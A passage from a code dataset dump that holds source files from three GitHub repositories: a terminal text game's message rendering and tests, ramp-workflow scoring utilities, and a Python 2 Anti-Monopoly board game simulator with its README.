2'\nprogressBar = \"[=========================================================-------] 120\"\n# progressBar = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\nfirst_message_content = \"\"\" \nHey Dan. You don\\\\'t know me, but I need your \nhelp. \nI wish I could tell you more but time is short. \n \n type \\\\'ls\\\\' to see files. use cat to \ndisplay their content.\n\"\"\"\n\nfirst_message_raw = \"\"\" .-----------------------------------------------------------------.\n%-mamamas / .-. Hey Dan. You don\\\\'t know me, but I need your .-. \\\\\n%-mamamas| / \\ help. / \\ |\n%-mamamas| |\\_. | I wish I could tell you more but time is short. | /| |\n%-mamamas|\\| | /| |\\ | |/|\n%-mamamas| `---\\\\' | type \\\\'ls\\\\' to see files. use cat to | `---\\\\' |\n%-mamamas| | display their content. | | \n%-mamamas| |-----------------------------------------------------| |\n%-mamamas\\ | | /\n%-mamamas \\ / \\ /\n%-mamamas `---\\\\' `---\\\\'\"\"\"\n\nfirst_message = \"\"\" .-----------------------------------------------------------------.\n / .-. Hey Dan. You don\\\\'t know me, but I need your .-. \\\\\n| / \\ help. / \\ |\n| |\\_. | I wish I could tell you more but time is short. | /| |\n|\\| | /| |\\ | |/|\n| `---\\\\' | type \\\\'ls\\\\' to see files. use cat to | `---\\\\' |\n| | display their content. | | \n| |-----------------------------------------------------| |\n\\ | | /\n \\ / \\ /\n `---\\\\' `---\\\\'\"\"\"\n# first_message = first_message_raw.replace('mamama', '50')\n\n\n\n#### ascii progress bar at the top\n\n## use tput cols and tput lines to render \n## use tput cup x y - see how it works " }, { "alpha_fraction": 0.5933933854103088, "alphanum_fraction": 0.6246246099472046, "avg_line_length": 39.63414764404297, "blob_id": "43faedb6977e957e0c569dbd3a9ca58e87b91439", "content_id": "2955d5e5e555fa562f8bf60404c011e171801235", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1665, "license_type": "no_license", "max_line_length": 82, "num_lines": 41, "path": "/tests/messages_test.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import unittest \nimport sys\nimport os\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom src.messages import Message\nfrom test_strings import first_message_no_tabs, first_message\n\n\nclass MessagesTest(unittest.TestCase):\n def test_creates_message(self):\n new_message = Message(\"hello\", \"111\", (0,0))\n self.assertEqual(new_message.message, [\"hello\"])\n self.assertEqual(new_message.id, \"111\", (0,0))\n def test_creates_message_with_new_lines(self):\n new_message = Message(first_message_no_tabs, \"111\", (50,20))\n self.assertEqual(new_message.message, first_message) \n def test_deletes_message(self):\n new_message = Message(\"hello\", \"111\", (0,0))\n self.assertEqual(new_message.deleteMessage, [\" \"])\n def test_delete_message_with_new_lines(self):\n new_message = Message(\"hello\\n\", \"111\", (0,0))\n self.assertEqual(new_message.deleteMessage, [\" \"])\n def test_delete_message_with_new_lines2(self):\n new_message = Message(\"hel\\n\", \"111\", (0,0))\n self.assertEqual(new_message.deleteMessage, [\" \"]) \n def test_delete_message_with_new_lines_in_middle_of_screen(self):\n new_message = Message(\"hello\\nhiiii\\nyooooo\\n\", \"111\", (51,50))\n self.assertEqual(new_message.deleteMessage, [\" \",\" \",\" \"])\n def test_x_and_Y(self):\n new_message = Message(\"hello\\nhiiii\\nyooooo\\n\", \"111\", (51,50))\n self.assertEqual(new_message.x, 51)\n self.assertEqual(new_message.y, 50) \n def test_create_combined_message(self):\n pass \n\n \n \n\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.6336314678192139, "alphanum_fraction": 0.6432915925979614, "avg_line_length": 43.380950927734375, "blob_id": "492d4b2293862e62439c09d83004a96230714ffe", "content_id": "c8203dc2d24dc54454d1e8ffe35626247ee40caf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2795, "license_type": "no_license", "max_line_length": 169, "num_lines": 63, "path": "/src/messages.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import re\nfrom strings import progressBar, first_message, totalxp\nfrom consts import IN_WIDTH\nfrom utils import removeNewLine\nfrom renderer import saveCursorPosition, restoreCursorPosition, historyCoversScreen, goto, printMessage, write, printMessageAt, combineHistoryAndMessage, getTerminalSize\n\nclass Message():\n @staticmethod\n def createDeleteMessage(message, x):\n split_message = removeNewLine(message).split(\"\\n\")\n erased_split_message = [re.sub(r'.', \" \", msg) for msg in split_message]\n return erased_split_message\n @staticmethod\n def createMessage(message, x): \n split_message = removeNewLine(message).split(\"\\n\")\n return split_message\n def __init__(self, message, id, startPosition):\n self.id = id\n self.message = self.createMessage(message, startPosition[0])\n self.rawMessage = message\n self.deleteMessage = self.createDeleteMessage(message, startPosition[0])\n self.startPosition = startPosition\n self.x = startPosition[0]\n self.y = startPosition[1]\n def write(self):\n if len(self.message) == 1:\n printMessageAt(self.message[0], self.startPosition)\n printMessageAt(self.message, self.startPosition)\n def erase(self):\n printMessageAt(self.deleteMessage, (self.x, self.y-1) )\n def overlay(self, line_history):\n _ , screen_height = getTerminalSize()\n y = self.y\n if historyCoversScreen(line_history, screen_height):\n y = y-1\n if len(self.message) == 1:\n printMessageAt(self.message[0], (self.x, y)) \n else:\n combinedMessage = combineHistoryAndMessage(self.message, self.y, line_history, screen_height)\n printMessageAt(combinedMessage, (self.x, y))\n def clean(self, line_history):\n _ , screen_height = getTerminalSize()\n y = self.y\n if historyCoversScreen(line_history, screen_height):\n y = y-2\n if len(self.deleteMessage) == 1:\n printMessageAt(self.deleteMessage[0], (self.x, y))\n return\n combinedMessage = combineHistoryAndMessage(self.deleteMessage, y + 1 , line_history, screen_height)\n printMessageAt(combinedMessage, (self.x, y))\n return\n if len(self.deleteMessage) == 1:\n printMessageAt(self.deleteMessage[0], (self.x, y)) \n else:\n combinedMessage = combineHistoryAndMessage(self.deleteMessage, y , line_history, screen_height)\n printMessageAt(combinedMessage, (self.x, y))\n \n\n \n\ntotalxp = Message(totalxp, \"xp message\", (IN_WIDTH + 28, 9))\nprogressBar = Message(progressBar, \"prg_bar\", (IN_WIDTH + 2, 10))\nlevel1_firstMessage = Message(first_message, \"lvl1\", (IN_WIDTH + 0, 11))" } ]
10
aboucaud/ramp-workflow
https://github.com/aboucaud/ramp-workflow
ea71a594fd79b0aed1a5259d2abd1d8708dfb9a5
978ad0c3caf105b003fdbbab4631916d1a5d9e46
0d058568c75c7b5ce26cf1ce062f7fa071737870
refs/heads/master
2021-01-13T12:57:44.433199
2017-06-20T12:44:18
2017-06-20T12:44:18
94,901,024
0
0
null
2017-06-20T14:34:46
2017-06-20T14:34:48
2017-06-25T20:48:08
Python
[ { "alpha_fraction": 0.7083333134651184, "alphanum_fraction": 0.7129629850387573, "avg_line_length": 32.230770111083984, "blob_id": "d99429cb8c16a3f20309db24f8cb0b7e3b4fd91f", "content_id": "f849870acb12501df35590b014a79457b4081e05", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 432, "license_type": "permissive", "max_line_length": 67, "num_lines": 13, "path": "/rampwf/score_types/auc.py", "repo_name": "aboucaud/ramp-workflow", "src_encoding": "UTF-8", "text": "from sklearn.metrics import roc_auc_score\n\n\ndef score_function(ground_truths, predictions, valid_indexes=None):\n if valid_indexes is None:\n valid_indexes = slice(None, None, None)\n y_proba = predictions.y_pred[valid_indexes]\n y_true_proba = ground_truths.y_pred_label_index[valid_indexes]\n score = roc_auc_score(y_true_proba, y_proba[:, 1])\n return score\n\n# default display precision in n_digits\nprecision = 2\n" }, { "alpha_fraction": 0.8206896781921387, "alphanum_fraction": 0.8206896781921387, "avg_line_length": 31.22222137451172, "blob_id": "144ae63ddc3f873793136b1b70525c4cc5ba7f4c", "content_id": "bb11a80c98cc731d57a3b94c133c889f093ef597", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "permissive", "max_line_length": 42, "num_lines": 9, "path": "/rampwf/workflows/__init__.py", "repo_name": "aboucaud/ramp-workflow", "src_encoding": "UTF-8", "text": "from . import air_passengers\nfrom . import classifier\nfrom . import clusterer\nfrom . import drug_spectra\nfrom . import feature_extractor\nfrom . import feature_extractor_classifier\nfrom . import feature_extractor_regressor\nfrom .regressor import Regressor\nfrom .classifier import Classifier\n" }, { "alpha_fraction": 0.792682945728302, "alphanum_fraction": 0.792682945728302, "avg_line_length": 94.83333587646484, "blob_id": "673aa2787590d1f674bccf4d5e8a113d0a085d0a", "content_id": "7c01ab8e0e47424b2bf7ae152ee167362bd7d0cd", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 574, "license_type": "permissive", "max_line_length": 357, "num_lines": 6, "path": "/README.md", "repo_name": "aboucaud/ramp-workflow", "src_encoding": "UTF-8", "text": "# ramp-workflow\nToolkit for building analytics workflows on the top of pandas and scikit-learn. Primarily intended to feed RAMPs.\n\nWorkflow elements are file names. Most of them are python code files, they should have no extension. They will become editable on RAMP. Other files, e.g. external_data.csv or comments.txt whould have extensions. Editability fill be inferred from extension (e.g., txt is editable, csv is not, only uploadable). File names should contain no more than one '.'.\n\nTests suppose that ramp-kits and ramp-workflows are installed in the same directory." } ]
3
mehmet-sahinoglu/simpetests
https://github.com/mehmet-sahinoglu/simpetests
25a177ce4a89e5069e9a8d7fa47b12340bfce3cf
844bc2026bce7145b1914704336d54a192b66dd1
8ef29e82ca5adf9b33887c6bffaa29a2a8da2b8e
refs/heads/master
2020-03-27T02:37:43.586351
2018-08-23T05:47:32
2018-08-23T05:47:32
145,805,090
0
0
null
2018-08-23T05:32:23
2018-08-23T05:36:40
2018-08-23T05:47:32
Python
[ { "alpha_fraction": 0.5807430148124695, "alphanum_fraction": 0.5898407697677612, "avg_line_length": 29.604650497436523, "blob_id": "6a516e227bef74d6491d43351c886956737faa35", "content_id": "e9700b9e981c6124a35a210b295cd4d32ef90711", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1319, "license_type": "no_license", "max_line_length": 83, "num_lines": 43, "path": "/aircraft.py", "repo_name": "mehmet-sahinoglu/simpetests", "src_encoding": "UTF-8", "text": "class Flight:\n \"\"\" A Flight with a particular passenger aircraft test 2\"\"\"\n\n def __init__(self, number, aircraft):\n if not number[:2].isalpha():\n raise ValueError(\"No airline code in'{}\".format(number))\n\n if not number[:2].isupper():\n raise ValueError(\"Invalid Airline code '{}'\".format(number))\n\n if not (number[2:].isdigit() and int(number[2:]) <= 9999):\n raise ValueError(\"Invalid route number {}\".format(number))\n\n self._number = number\n self._aircraft = aircraft\n\n rows, seats = self._aircraft.seating_plan()\n self._seating = [None] + [{letter: None for letter in seats} for _ in rows]\n\n def number(self):\n return self._number\n\n def airline(self):\n return self._number\n\n def aircraft_model (self):\n return self._aircraft.model()\n\n def _parse_seat(self, seat):\n \"\"\"Parse a seat designator into a valid row and letter.\n\n Args:\n seat: A Seat designator such as 12F\n\n Returns:\n A tuple containing an integer and a string for row and seat\n \"\"\"\n row_numbers, seat_letters= self._aircraft.seating_plan()\n\n letter = seat[-1]\n\n if letter not in seat_letters:\n raise ValueError(\"Invalid seat letter{}\".format(letter))\n\n\n\n" } ]
1
stonek4/anti-monopoly
https://github.com/stonek4/anti-monopoly
ff820d9c3dcb597fe890e5f55b522260d9959bdb
d381d6a483fdb4443b6f3d5fe268398b392171e4
e8ffca257f4e8b64f485eb2d2d3b37709bb0172e
refs/heads/master
2021-01-17T17:17:19.702376
2016-06-02T04:16:02
2016-06-02T04:16:02
60,215,029
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7869520783424377, "alphanum_fraction": 0.7869520783424377, "avg_line_length": 97.0999984741211, "blob_id": "576963b0ba9fcd986167610559879c628c9e5d31", "content_id": "3cee958a225e00ffd452fefb38d5e1b9047f442d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 981, "license_type": "permissive", "max_line_length": 664, "num_lines": 10, "path": "/README.md", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "# Anti-Monopoly Simulation\n\nWhile on vacation, my parents and I picked up a game called Anti-Monopoly, which was clearly a spinoff of the original Monopoly game. The game (found here: http://www.antimonopoly.com/) uses the basic monopoly rules with some twists, the largest being the two types of players (competitors and monopolists). Upon playing the game, my parents and I discovered that the game seems to heavily favor monopolists over competitors, and the game also appeared to take longer than normal monopoly (which already takes a long time) to play. The purpose of this simulator is to test different rule sets in order to create a fair rule set that shortens the length of games.\n\n## How to Use\nThe simulator is a python script, that can be run by downloading the files and running:\n\n`$ python main.py`\n\nThere is a lot more that can be configured, and in a while I will update the program with documentation and a config file that will allow for all sorts of madness.\n" }, { "alpha_fraction": 0.5807828903198242, "alphanum_fraction": 0.5829181671142578, "avg_line_length": 27.67346954345703, "blob_id": "6e3bffc77f402e702e390be20f7311b3caaddfe3", "content_id": "9a1ddb24160dcdd2f764380526ce2ff6d4b3925b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1405, "license_type": "permissive", "max_line_length": 83, "num_lines": 49, "path": "/classes/player.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "class PLAYER:\n def get_name(self):\n return self.name\n def get_style(self):\n return self.style\n def get_owned(self):\n return self.owned\n def add_prop(self, prop):\n self.owned.append(prop)\n return True\n def get_s_priorities(self):\n return self.s_priorities\n def get_b_priorities(self):\n return self.b_priorities\n def get_tolerance(self):\n return self.tolerance\n def get_budget(self):\n return self.budget\n def set_budget(self, amount):\n self.budget = amount\n return True\n def set_out(self):\n self.owned = []\n self.out = True\n return True\n def check_out(self):\n return self.out\n def set_jailed(self, option):\n self.jailed = option\n self.jail_timer = 2\n return True\n def get_jail_timer(self):\n return self.jail_timer\n def dec_jail_timer(self):\n self.jail_timer -= 1\n return True\n def check_jailed(self):\n return self.jailed\n def __init__(self, name, style, b_priorities, s_priorities, tolerance, budget):\n self.name = name\n self.style = style\n self.owned = []\n self.s_priorities = s_priorities\n self.b_priorities = b_priorities\n self.tolerance = tolerance\n self.budget = budget\n self.out = False\n self.jailed = False\n self.jail_timer = 0\n" }, { "alpha_fraction": 0.4865959584712982, "alphanum_fraction": 0.49270880222320557, "avg_line_length": 44.2599983215332, "blob_id": "b546cb9b2e48086ac02945e23feaba58dbc2c97c", "content_id": "164fc8a5c2eca9519d3f607ff8f343cf334feca9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13578, "license_type": "permissive", "max_line_length": 164, "num_lines": 300, "path": "/classes/game.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "import time\nimport math\nimport random\nfrom functions import roll\nfrom functions import num_owned\nfrom functions import get_owner\nfrom board import BOARD\nfrom player import PLAYER\n\nclass GAME:\n def print_out(self, text):\n if self.debugging == True:\n print text\n def check_t_bankruptcy(self, player, val):\n outcome = self.check_bal(player, val)\n if outcome == False:\n self.pay(player, player.get_budget())\n player.set_out()\n self.inc_turn()\n for prop in player.get_owned():\n prop.un_mortgage()\n self.print_out(\"Player \"+str(player.get_name())+\" has gone bankrupt to the bank, all properties are freed.\")\n return True\n self.pay(player, val)\n return False\n def check_p_bankruptcy(self, player, val, owner):\n outcome = self.check_bal(player, val)\n if outcome == False:\n self.collect(owner, player.get_budget())\n self.pay(player, player.get_budget())\n for pprop in player.get_owned():\n owner.add_prop(pprop)\n player.set_out()\n self.inc_turn()\n self.print_out(\"Player \"+str(player.get_name())+\" has gone bankrupt to Player \"+str(owner.get_name())+\", all properties were turned over.\")\n return True\n self.pay(player, val)\n self.collect(owner, val)\n return False\n def check_win(self):\n left = 0\n winner = \"\"\n for player in self.players:\n if player.check_out() == False:\n left += 1\n winner = player.get_name()\n if left >= 2:\n return False\n self.print_out(\"Player \"+str(winner)+\" wins!!!\")\n return True\n def move(self, player):\n value = roll(2)\n self.print_out(\"Player \"+str(self.turn)+\" rolled \" + str(value))\n self.locations[self.turn] += value\n if (self.locations[self.turn] >= len(self.board)-1):\n self.locations[self.turn] -= len(self.board)-1\n self.collect(player, 100)\n self.print_out(\"Player \"+str(self.turn)+\" moved to \"+self.board[self.locations[self.turn]].get_name())\n def move_to(self, player, prop):\n while True:\n if(self.board[self.locations[self.turn]].get_name() == prop):\n self.print_out(\"Player \"+str(self.turn)+\" moved to \"+self.board[self.locations[self.turn]].get_name())\n return\n else:\n self.locations[self.turn] += 1\n if (self.locations[self.turn] >= len(self.board)-1):\n self.locations[self.turn] -= len(self.board)-1\n self.collect(player, 100)\n def straight(self, player, prop):\n while True:\n if(self.board[self.locations[self.turn]].get_name() == prop):\n player.set_jailed(True)\n self.print_out(\"Player \"+str(self.turn)+\" moved straight to \"+self.board[self.locations[self.turn]].get_name())\n return\n else:\n self.locations[self.turn] += 1\n if (self.locations[self.turn] >= len(self.board)-1):\n self.locations[self.turn] -= len(self.board)-1\n player.set_jailed(True)\n def collect(self, player, value):\n player.set_budget(player.get_budget()+value)\n self.print_out(\"Player \"+str(player.get_name())+\" collected $\"+str(value) + \" | ($\" + str(player.get_budget()) + \")\")\n def pay(self, player, value):\n player.set_budget(player.get_budget()-value)\n self.print_out(\"Player \"+str(player.get_name())+\" paid $\"+str(value) + \" | ($\" + str(player.get_budget()) + \")\")\n return True\n def buy_prop(self, player, prop):\n if player.get_budget >= prop.get_cost():\n self.pay(player, prop.get_cost())\n player.add_prop(prop)\n self.print_out(\"Player \"+str(player.get_name())+\" purchased \"+ prop.get_name())\n def sell_houses(self, player, value):\n for pprop in player.get_owned():\n if pprop.get_style() == \"property\":\n while pprop.get_houses() > 0:\n pprop.rem_house()\n self.print_out(\"Player \"+str(player.get_name())+\" sold a house on \"+ pprop.get_name())\n self.collect(player, pprop.get_h_val()/2)\n if player.get_budget >= value:\n return True\n return False\n def buy_houses(self, player):\n for pprop in player.get_owned():\n if pprop.get_style() == \"property\":\n if pprop.get_houses() < 4 or (pprop.get_houses() == 4 and player.get_style() == \"c\"):\n if pprop.check_mortgage() == False and player.get_budget() >= pprop.get_h_val():\n if num_owned(player, pprop) > 1:\n self.pay(player, pprop.get_h_val())\n pprop.add_house()\n self.print_out(\"Player \"+str(player.get_name())+\" bought a house for \"+ pprop.get_name() + \" | ($\" + str(player.get_budget()) + \" rem)\")\n return True\n return False\n def mortgage(self, player, value):\n for pprop in player.get_owned():\n if pprop.get_style() == \"property\" and pprop.check_mortgage() == False:\n if pprop.get_houses() == 0:\n pprop.mortgage()\n self.print_out(\"Player \"+str(player.get_name())+\" mortgaged \"+ pprop.get_name())\n self.collect(player, pprop.get_m_val())\n elif pprop.check_mortgage == False:\n pprop.mortgage()\n self.print_out(\"Player \"+str(player.get_name())+\" mortgaged \"+ pprop.get_name())\n self.collect(player, pprop.get_m_val())\n if player.get_budget() >= value:\n return True\n return False\n def unmortgage(self, player):\n for pprop in player.get_owned():\n if pprop.check_mortgage() == True and pprop.get_um_val() < player.get_budget():\n self.pay(player, pprop.get_um_val())\n pprop.un_mortgage()\n self.print_out(\"Player \"+str(player.get_name())+\" unmortgaged \"+ pprop.get_name())\n return True\n return False\n def check_bal(self, player, val):\n while val > player.get_budget():\n for p in player.get_s_priorities():\n if p == \"h\":\n outcome = self.sell_houses(player, val)\n if p == \"m\":\n outcome = self.mortgage(player, val)\n if outcome != True:\n outcome = self.mortgage(player, val)\n if outcome != True:\n return False\n return True\n def inc_turn(self):\n if (self.turn == len(self.players)-1):\n self.turn = 0\n else:\n self.turn += 1\n def take_turn(self):\n player = self.players[self.turn]\n if (player.check_out() == True):\n self.inc_turn()\n return\n if player.check_jailed() == True:\n if player.budget >= 50 and player.get_style() == \"m\":\n self.pay(player, 50)\n player.set_jailed(False)\n self.print_out (\"Player \" + str(self.turn) + \" left jail\")\n else:\n if player.get_jail_timer() > 0:\n first = roll(1)\n second = roll(1)\n self.print_out(\"Player \"+str(self.turn)+\" is in jail and rolled \" + str(first)+ \" \" + str(second))\n if first != second:\n player.dec_jail_timer()\n self.inc_turn()\n return\n player.set_jailed(False)\n self.print_out (\"Player \" + str(self.turn) + \" left jail\")\n self.move(player)\n prop = self.board[self.locations[self.turn]]\n if (prop.get_style() == \"property tax\"):\n outcome = self.check_t_bankruptcy(player, prop.get_value())\n if outcome == True:\n return\n if (prop.get_style() == \"income tax\"):\n total = 0\n for pprop in player.get_owned():\n if pprop.check_mortgage() == False:\n total += pprop.get_cost()\n if pprop.get_style() == \"property\":\n total += pprop.get_houses() * pprop.get_h_val()\n total *= .10\n total += player.get_budget() * .10\n total = int(math.floor(total))\n outcome = self.check_t_bankruptcy(player, prop.get_value(total))\n if outcome == True:\n return\n if (prop.get_style() == \"go to\"):\n self.straight(player, \"sightseeing tour\")\n if (prop.get_style() == \"cm\" or prop.get_style() == \"anti-monopoly foundation\"):\n chance = prop.get_value(player.get_style())\n self.print_out (\"Player \" + str(self.turn) + \" must \" + chance[0] + \" \" + str(chance[1]))\n if (chance[0] == \"move\"):\n self.move_to(player, chance[1])\n elif(chance[0] == \"collect\"):\n self.collect(player, chance[1])\n elif(chance[0] == \"pay\"):\n outcome = self.check_t_bankruptcy(player, chance[1])\n if outcome == True:\n return\n elif(chance[0] == \"straight\"):\n self.straight(player, chance[1])\n elif(chance[0] == \"collect_c\"):\n for opp in self.players:\n if opp.get_style() == \"c\" and opp.check_out() == False:\n outcome = self.check_p_bankruptcy(player, chance[1], opp)\n if outcome == True:\n return\n elif(chance[0] == \"collect_m\"):\n for opp in self.players:\n if opp.get_style() == \"m\" and opp.check_out() == False:\n outcome = self.check_p_bankruptcy(player, chance[1], opp)\n if outcome == True:\n return\n can_buy = False\n prop = self.board[self.locations[self.turn]]\n if (prop.get_style() == \"property\" or prop.get_style() == \"utility\" or prop.get_style() == \"transport\"):\n owner_name = get_owner(prop.get_name(), self.players)\n if owner_name >= 0:\n owner = self.players[owner_name]\n if owner_name != self.turn and owner_name >= 0 and prop.check_mortgage() == False and owner.check_jailed() == False:\n val = prop.get_value(owner.get_style(), num_owned(owner, prop))\n outcome = self.check_p_bankruptcy(player, val, owner)\n if outcome == True:\n return\n\n if owner_name < 0:\n can_buy = True\n if player.get_tolerance() <= player.get_budget():\n for p in player.get_b_priorities():\n if p == \"p\":\n if can_buy == True:\n if player.get_budget() > prop.get_cost():\n self.buy_prop(player, prop)\n if p == \"h\":\n buying = True\n while buying == True and player.get_tolerance() <= player.get_budget():\n buying = self.buy_houses(player)\n if p == \"u\":\n unmort = True\n while unmort == True and player.get_tolerance() <= player.get_budget():\n unmort = self.unmortgage(player)\n self.inc_turn()\n def get_stats(self):\n print \" \"\n print \"~~~~STATISTICS~~~~\"\n for player in self.players:\n print \"Player \" + str(player.get_name()) + \" ~ $\" + str(player.get_budget()),\n if player.get_style() == \"m\":\n print \" is a monopolist\"\n else:\n print \" is a competitor\"\n for prop in player.get_owned():\n if prop.get_style() == \"property\":\n print prop.get_name() + \" \" + str(prop.get_houses()) + \" houses\",\n else:\n print prop.get_name(),\n if prop.check_mortgage() == True:\n print \" is mortgaged\"\n else:\n print \"\"\n def __init__(self, num_players, debugging, slow):\n i = 0\n min_tol = 50\n max_tol = 400\n self.debugging = debugging\n self.turn = 0\n self.locations = []\n self.new_board = BOARD()\n self.board = self.new_board.get_board()\n self.players = []\n while (i < num_players):\n if ((i % 2) == 0):\n self.players.append(PLAYER(i, \"m\", [\"h\",\"p\",\"u\"], [\"h\",\"m\"], random.randint(min_tol,max_tol),1500))\n else:\n self.players.append(PLAYER(i, \"c\", [\"h\",\"p\",\"u\"], [\"m\",\"h\"], random.randint(min_tol,max_tol),1500))\n self.locations.append(0)\n i += 1\n i = 0\n while i <= 1000:\n alive = False\n while alive == False:\n if self.players[self.turn].check_out() == False:\n alive = True\n else:\n self.inc_turn()\n print \"TURN \" + str(i+1)\n self.take_turn()\n print \"\"\n if slow == True:\n time.sleep(5)\n winner = self.check_win()\n if winner == True:\n break\n i += 1\n self.get_stats()\n" }, { "alpha_fraction": 0.5150631666183472, "alphanum_fraction": 0.523809552192688, "avg_line_length": 24.725000381469727, "blob_id": "3e6bae8cec820b2884b0c41c83e5ce13c6c2dda6", "content_id": "39f972f193536910a80d77bd89c46d63e928f89e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "permissive", "max_line_length": 78, "num_lines": 40, "path": "/classes/functions.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "import random\n\ndef roll(num):\n total = 0\n while num > 0:\n total += random.randint(1,6)\n num -= 1\n return total\n\ndef get_owner(prop, players):\n for player in players:\n for pprop in player.get_owned():\n if pprop.get_name() == prop:\n return player.get_name()\n return -1\n\ndef num_owned(player,prop):\n num = 0\n for pprop in player.get_owned():\n if prop.get_style() == \"property\" and pprop.get_style() == \"property\":\n if pprop.get_city() == prop.get_city():\n num += 1\n else:\n if pprop.get_style() == prop.get_style():\n num += 1\n return num\n\ndef find_mult_own(props):\n cities = []\n mults = []\n mult_props = []\n for prop in props:\n if (prop.get_city in cities):\n mults.append(prop.get_city())\n else:\n cities.append(prop.get_city())\n for prop in props:\n if (prop.get_city() in mults):\n mult_props.append(prop)\n return mult_props\n" }, { "alpha_fraction": 0.5779502987861633, "alphanum_fraction": 0.6686335206031799, "avg_line_length": 57.54545593261719, "blob_id": "34a01bc4aeea532b6219d9eb4d3d605afab963ae", "content_id": "406a2f657d076d10e9f9d0f0860159d403b6f540", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3220, "license_type": "permissive", "max_line_length": 92, "num_lines": 55, "path": "/classes/board.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "from square import SQUARE\nfrom square import PROPERTY\nfrom square import CM\nfrom square import INCOME_TAX\nfrom square import UTILITY\nfrom square import TRANSPORT\nfrom square import AMF\nfrom square import GOTO\nfrom square import PROPERTY_TAX\n\nclass BOARD:\n def get_board(self):\n return self.board\n def __init__(self):\n self.board = []\n self.board.append(SQUARE(\"start\",\"start\"))\n self.board.append(PROPERTY(\"basin st.\",\"new orleans\",60,50,6,6,5,10))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"french quarter\",\"new orleans\",60,50,6,6,5,10))\n self.board.append(INCOME_TAX(\"income tax\"))\n self.board.append(TRANSPORT(\"u.s. railroad\"))\n self.board.append(PROPERTY(\"sunset blvd.\",\"los angeles\",100,50,10,10,5,10))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"wilshire blvd.\",\"los angeles\",100,50,10,10,5,10))\n self.board.append(PROPERTY(\"hollywood blvd.\",\"los angeles\",120,66,12,12,5,10))\n self.board.append(SQUARE(\"sightseeing tour\",\"sightseeing tour\"))\n self.board.append(PROPERTY(\"rush st.\",\"chicago\",140,100,14,14,10,20))\n self.board.append(UTILITY(\"u.s. electric company\"))\n self.board.append(PROPERTY(\"state st.\",\"chicago\",140,100,14,14,10,20))\n self.board.append(PROPERTY(\"michigan ave.\",\"chicago\",160,100,16,16,10,20))\n self.board.append(TRANSPORT(\"u.s. bus company\"))\n self.board.append(PROPERTY(\"locust st.\",\"philadelphia\",180,100,18,18,10,20))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"chesnut st.\",\"philadelphia\",180,100,18,18,10,20))\n self.board.append(PROPERTY(\"walnut st.\",\"philadelphia\",200,100,20,20,10,20))\n self.board.append(AMF(\"anti-monopoly foundation\"))\n self.board.append(PROPERTY(\"brattle st.\",\"boston\",220,150,22,22,15,30))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"harvard square\",\"boston\",220,150,22,22,15,30))\n self.board.append(PROPERTY(\"beacon st.\",\"boston\",240,150,24,24,15,30))\n self.board.append(TRANSPORT(\"u.s. air line\"))\n self.board.append(PROPERTY(\"georgetown\",\"washington\",260,150,26,26,15,30))\n self.board.append(PROPERTY(\"constitution ave.\",\"washington\",260,150,26,26,15,30))\n self.board.append(UTILITY(\"u.s. gas company\"))\n self.board.append(PROPERTY(\"pennsylvania ave.\",\"washington\",280,150,28,28,15,30))\n self.board.append(GOTO(\"go to\"))\n self.board.append(PROPERTY(\"fisherman's wharf\",\"san francisco\",300,200,30,30,20,40))\n self.board.append(PROPERTY(\"union square\",\"san francisco\",300,200,30,30,20,40))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"nob hill\",\"san francisco\",320,200,32,32,20,40))\n self.board.append(TRANSPORT(\"u.s. trucking company\"))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"fifth ave.\",\"new york\",350,200,35,35,20,40))\n self.board.append(PROPERTY_TAX(\"property tax\"))\n self.board.append(PROPERTY(\"wall st.\",\"new york\",400,200,40,40,20,40))\n" }, { "alpha_fraction": 0.6276595592498779, "alphanum_fraction": 0.6382978558540344, "avg_line_length": 12.428571701049805, "blob_id": "787c96ac1c365e5e8f16222527f83f10293f0da5", "content_id": "70a6cf213cdbbf3c2e84b66766fdad088cbb67da", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "permissive", "max_line_length": 31, "num_lines": 7, "path": "/main.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "from classes.game import GAME\n\ndef main():\n test = GAME(4, True, False)\n return\n\nmain()\n" }, { "alpha_fraction": 0.47033968567848206, "alphanum_fraction": 0.4885921776294708, "avg_line_length": 28.883838653564453, 